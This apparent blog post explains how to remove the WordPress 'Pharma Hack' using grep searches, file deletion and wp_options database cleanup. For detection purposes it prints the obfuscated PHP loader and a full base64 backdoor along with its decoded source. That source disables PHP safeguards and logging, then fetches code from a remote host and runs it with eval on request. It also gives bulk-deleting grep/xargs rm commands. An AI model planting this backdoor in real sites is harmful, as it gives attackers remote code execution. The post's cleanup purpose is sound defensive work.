Removing WordPress Pharma Hack

Pleth, LLC, and probably one of the sharpest guys I know, and we toiled over this thing daily for about a week or so until we finally eradicated it from all of our WordPress installations. For the benefit of all of you that are still wrestling w/ this hack, here’s exactly how we removed it…

Locate all base64_decode

This hack, like a lot of others, used base64 code to disguise JavaScript (so we have to locate it and remove it, this is what it will look like)

< ? php $XZKsyG=’as’;$RqoaUO=’e';$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t';$joEDdb
=’b’.$XZKsyG.$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$j
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY.......and so on...

To locate and remove the code, you will need to SSH into your server, CD into the wordpress home directory and do the following

grep -r 'php $[a-zA-Z]*=.as.;' * |awk -F : '{print $1}' | xargs -I{} rm -v {}

This will scan the entire folder and all it’s sub-directories for any file containing the string “php $RANDOMLETTERS=’as'” and delete it verbosely. If you do not wish to delete it automatically just run this to print out the filename.

grep -r 'php $[a-zA-Z]*=.as.;' * |awk -F : '{print $1}'

When we did this, there were about 50 files that contained the exploit.  There are other files containing nasty code as well. You will also need to to search for and remove files containing the string “wp_class_support”.

grep -r wp_class_support * |awk -F : '{print $1}' |xargs -I{} rm -v {}

This bit of syntax will search for files with that string and delete them (if you want to manually delete them, leave off the xargs part as per the above example).

I also found this nasty thing (not sure if it is related to the Pharma Hack) in several files. All were WordPress core files, so you MUST replace every WordPress file on your site with clean ones. DO NOT do this via the internal utility – use FTP, SCP, or whatever to get these files uploaded. Once you have done this, do

grep -r QGluaV9yZXN0b * |awk -F : '{print $1}'

This will search the remaining files for the exploit. Any files containing this MUST be replaced or you are still infected. The full text of the exploit the base64 encoded string as follows:

QGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTtAaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpO0BpbmlfcmVzdG9yZSgic2Fm
ZV9tb2RlX2luY2x1ZGVfZGlyIik7QGluaV9yZXN0b3JlKCJzYWZlX21vZGVfZXhlY19kaXIiKTtAaW5pX3Jlc3RvcmUoImRp
c2FibGVfZnVuY3Rpb25zIik7QGluaV9yZXN0b3JlKCJhbGxvd191cmxfZm9wZW4iKTsNCmlmKEBmdW5jdGlvbl9leGlzdHMo
J2luaV9zZXQnKSkNCntAaW5pX3NldCgnZXJyb3JfbG9nJyxOVUxMKTsgQGluaV9zZXQoJ2xvZ19lcnJvcnMnLDApOyBAaW5p
X3NldCgnZmlsZV91cGxvYWRzJywxKTsgQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsMSk7fQ0KZWxzZXtAaW5pX2FsdGVy
KCdlcnJvcl9sb2cnLE5VTEwpOyBAaW5pX2FsdGVyKCdsb2dfZXJyb3JzJywwKTsgQGluaV9hbHRlcignZmlsZV91cGxvYWRz
JywxKTsgQGluaV9hbHRlcignYWxsb3dfdXJsX2ZvcGVuJywxKTt9DQpmdW5jdGlvbiBHZXRTaGVsbENvbnRlbnQoJGhvc3Qs
JHVybCl7aWYoQGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpeyRmdWxsX3VybD0naHR0cDovLycuJGhvc3QuJy8nLiR1
cmw7JGN1cmw9Y3VybF9pbml0KCk7Y3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9VUkwsJGZ1bGxfdXJsKTtjdXJsX3NldG9w
dCgkY3VybCxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLHRydWUpO2N1cmxfc2V0b3B0KCRjdXJsLENVUkxPUFRfSEVBREVSLGZh
bHNlKTtjdXJsX3NldG9wdCgkY3VybCxDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULDEwKTtjdXJsX3NldG9wdCgkY3VybCxDVVJM
T1BUX1VTRVJBR0VOVCwnTW96aWxsYS80LjAnKTskZGF0YT1AY3VybF9leGVjKCRjdXJsKTtjdXJsX2Nsb3NlKCRjdXJsKTty
ZXR1cm4gJGRhdGE7fWVsc2VpZihAZnVuY3Rpb25fZXhpc3RzKCdmc29ja29wZW4nKSl7JGZwPUBmc29ja29wZW4oJGhvc3Qs
ODAsJGVycm5vLCRlcnJzdHIsMTApO2lmKCRmcCl7JG91dD0iR0VUIC8kdXJsIi4iIEhUVFAvMS4wXHJcbiI7JG91dCAuPSJI
b3N0OiAkaG9zdFxyXG4iOyRvdXQgLj0iVXNlci1BZ2VudDogTW96aWxsYS80LjBcclxuIjskb3V0IC49IkNvbm5lY3Rpb246
IENsb3NlXHJcblxyXG4iO0Bmd3JpdGUoJGZwLCRvdXQpO3doaWxlKCRhbnNbXT1mZ2V0cygkZnApKTtmY2xvc2UoJGZwKTsk
YW5zPXRyaW0oaW1wbG9kZSgnJywkYW5zKSk7JGRhdGE9KHRyaW0oc3Vic3RyKCRhbnMsc3RycG9zKCRhbnMsIlxyXG5cclxu
IikpKSk7cmV0dXJuICRkYXRhO319ZWxzZWlmKEBmdW5jdGlvbl9leGlzdHMoJ2ZpbGVfZ2V0X2NvbnRlbnRzJykgJiYgQGlu
aV9nZXQoJ2FsbG93X3VybF9mb3BlbicpPT0xKXskZnVsbF91cmw9J2h0dHA6Ly8nLiRob3N0LicvJy4kdXJsOyRkYXRhPUBm
aWxlX2dldF9jb250ZW50cygkZnVsbF91cmwpO3JldHVybiAkZGF0YTt9fQ0KaWYoJF9SRVFVRVNUWydzaCddICE9ICIiKSB7
ZXZhbChiYXNlNjRfZGVjb2RlKEdldFNoZWxsQ29udGVudCgiXHg3M1x4NjVceDZmXHg3NFx4NmZceDZmXHg3M1x4MmVceDYz
XHg2Zlx4NmQiLCJzL2kucGhwPyIuJF9SRVFVRVNUWydzaCddLiImaG9zdD0iLnVybGVuY29kZSgkX1NFUlZFUlsnU0VSVkVS
X05BTUUnXSkuIiZ1cmw9Ii51cmxlbmNvZGUoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKSkpO2V4aXQ7fQ==

Which decodes as

@ini_restore("safe_mode");@ini_restore("open_basedir");@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");@ini_restore("disable_functions");@ini_restore("allow_url_fopen");
if(@function_exists('ini_set'))
{@ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);}else{@ini_alter('error_log',NULL); @ini_alter('log_errors',0);
@ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1);}
function GetShellContent($host,$url){if(@function_exists('curl_init'))
{$full_url='http://'.$host.'/'.$url;$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,$full_url);curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_HEADER,false);curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0');$data=@curl_exec($curl);
curl_close($curl);return $data;}elseif(@function_exists('fsockopen'))
{$fp=@fsockopen($host,80,$errno,$errstr,10);
if($fp){$out="GET /$url"." HTTP/1.0rn";$out .="Host: $hostrn";
$out .="User-Agent: Mozilla/4.0rn";$out .="Connection: Closernrn";
@fwrite($fp,$out);while($ans[]=fgets($fp));fclose($fp);$ans=trim(implode('',$ans));
$data=(trim(substr($ans,strpos($ans,"rnrn"))));
return $data;}}elseif(@function_exists('file_get_contents') && @ini_get('allow_url_fopen')==1)
{$full_url='http://'.$host.'/'.$url;$data=@file_get_contents($full_url);return $data;}}
if($_REQUEST['sh'] != "")
{eval(base64_decode(GetShellContent("x73x65x6fx74x6fx6fx73x2ex63x6fx6d","s/i.php?"
.$_REQUEST['sh']."&host=".urlencode($_SERVER['SERVER_NAME'])."&url=".urlencode
($_SERVER['REQUEST_URI']))));exit;}

I went ahead and scanned the whole site for files that had base64_decodes in them. To search for these do the following:

grep -r base64 * |awk -F : '{print $1}' |sort |uniq

This will print out a list of each file that contains the string “base64”. You should examine each file carefully for rouge content, as many files legitimately contain this string and need it to function. If you are unsure of the code, replace the file with a fresh copy. Most of the files I’ve seen that are infected have the base64 statement at the very top of the file but this is not always the case.

Once you get the files cleaned, you need to work on the database. The exploit adds and/or modifies entries in the wp_options table. Using the MySQL interpreter or phpMyAdmin run the following query:

SELECT * FROM `wp_options` where `option_name` LIKE 'rss%' ORDER BY `wp_options`.`option_name` ASC;

This will search the wp_options table for all entries beginning with rss_ and return them. You will need to delete each one that looks similar to this:

rss_552afe0001e673901a9f2caebdd3141d

rss_ followed by strings of random numbers or letters is bad and MUST be deleted as they are added by the exploit. Also, the exploit adds or modifies several other records in the same table. A couple of the sites we found recommended running this query as well as these options should not be set or contain any data:

delete from wp_options where option_name = "class_generic_support";
delete from wp_options where option_name = "widget_generic_support";
delete from wp_options where option_name = "fwp’";
delete from wp_options where option_name = "wp_check_hash";
delete from wp_options where option_name = "ftp_credentials";

—————————————————————-

If all goes well, this information should help you eradicate the WordPress Pharma Hack from your wordpress installation. For a more detailed post on how to remove this hack, I highly recommend Matt Critcher’s post on his blog…